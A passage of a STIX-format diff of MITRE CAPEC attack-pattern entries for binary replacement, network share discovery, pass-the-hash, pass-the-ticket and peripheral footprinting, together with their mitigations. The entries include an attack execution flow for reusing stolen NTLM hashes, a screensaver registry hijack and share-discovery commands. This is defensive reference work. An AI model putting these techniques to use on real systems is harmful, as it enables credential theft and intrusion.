"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must fail to verify the integrity of the DLL before using them." + ], + "x_capec_skills_required": { + "High": "Trick the operating system in loading a malicious DLL instead of a legitimate DLL." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent unknown DLLs from loading through using an allowlist policy.", + "id": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--81f3c1eb-7e57-4f55-a177-cadc6a8aeba8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de1e1fe4-15df-4e37-9686-1b33e0ea2e10", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c8fbd576-b3bb-43e0-b295-5483e8f56bdf", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d42819b-82b4-4def-9360-d1f3e4d3ad65", + "modified": "2020-07-30T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of sxstrace.exe on Windows as well as manual inspection of the manifests.", + "id": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require code signing and avoid using relative paths for resources.", + "id": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-641-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32d49392-d7f7-401f-91bc-541841219209", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdc2b3ee-acf1-4c8b-a330-6fa318ec5f88", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. 
These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. 
This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insure that binaries commonly used by the system have the correct file permissions. Set operating system policies that restrict privilege elevation of non-Administrators. 
Use auditing tools to observe changes to system services.", + "id": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-642-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--85cbecfa-a889-485b-8231-630bdae5ed86", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d9181e23-1afd-428e-a52a-e276bea7a05c", + "spec_version": "2.1", + "target_ref": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary discovers connections between systems by exploiting the target system's standard practice of revealing them in searchable, common areas. 
Through the identification of shared folders/drives between systems, the adversary may further their goals of locating and collecting sensitive information/files, or map potential routes for lateral movement within the network.", + "external_references": [ + { + "external_id": "CAPEC-643", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/643.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Network Share Discovery", + "external_id": "T1135", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1135" + } + ], + "id": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Identify Shared Files/Directories on System", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is potentially able to identify the location of sensitive information or lateral pathways through the network.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line. The adversary, or their malware, can simply employ a set of commands that search for shared drives on the system (e.g., net view \\\\remote system or net share)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify unnecessary system utilities or potentially malicious software that may contain functionality to identify network share information, and audit and/or block them by using allowlist tools.", + "id": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-643-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--877214d8-d718-4bc4-9edf-9b6d4d5bad4a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5229d-6c9b-4ea1-a862-7a6797b8c070", + "spec_version": "2.1", + "target_ref": "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash 
and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. 
The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

  2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

  2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", + "id": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbe2baa0-43b4-4f18-8464-37c77c73232d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30748f93-76e1-4493-b028-a09a3ae0fe12", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee496b22-cfdc-468f-9798-52b53cce0d3b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--885bfaa4-7ef5-4cd8-b4b3-eeaa867bc6d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c5bf1ff-d38b-4163-b8d6-d921aed35652", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage system penetration testing and other defense in depth methods to determine vulnerable systems within a domain.", + "id": "course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-644-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0df6edf6-1157-43d2-8e50-4b6184d75a60", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--dd700183-d761-44fa-ac56-b6a20cc2cb3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Use of Captured Tickets (Pass The Ticket)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Bronze Butler (also known as Tick), has been shown to leverage forged Kerberos Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets to maintain administrative access on a number of systems. [REF-584]" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs physical access to the victim system.", + "The use of a third-party credential harvesting tool." + ], + "x_capec_skills_required": { + "High": "The adversary uses a third-party tool to obtain the necessary tickets to execute the attack.", + "Low": "Determine if Kerberos authentication is used on the server." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reset the built-in KRBTGT account password twice to invalidate the existence of any current Golden Tickets and any tickets derived from them.", + "id": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-645-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6333f5-1f2a-4b5f-94e2-17a344115ffb", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cc52780c-b04c-4940-a2d6-0498907ce5cf", + "spec_version": "2.1", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b8766158-fd84-4765-94da-1c65d865c83b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "spec_version": "2.1", + "target_ref": "attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries may 
attempt to obtain information about attached peripheral devices and components connected to a computer system. Examples may include discovering the presence of iOS devices by searching for backups, analyzing the Windows registry to determine what USB devices have been connected, or infecting a victim system with malware to report when a USB device has been connected. This may allow the adversary to gain additional insight about the system or network environment, which may be useful in constructing further attacks.", + "external_references": [ + { + "external_id": "CAPEC-646", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/646.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Peripheral Device Discovery", + "external_id": "T1120", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1120" + } + ], + "id": "attack-pattern--658d6220-f15c-44fb-8690-1d14088ed637", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Peripheral Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs either physical or remote access to the victim system." + ], + "x_capec_skills_required": { + "Medium": "If analyzing the Windows registry, the adversary must understand the registry structure to know where to look for devices." 
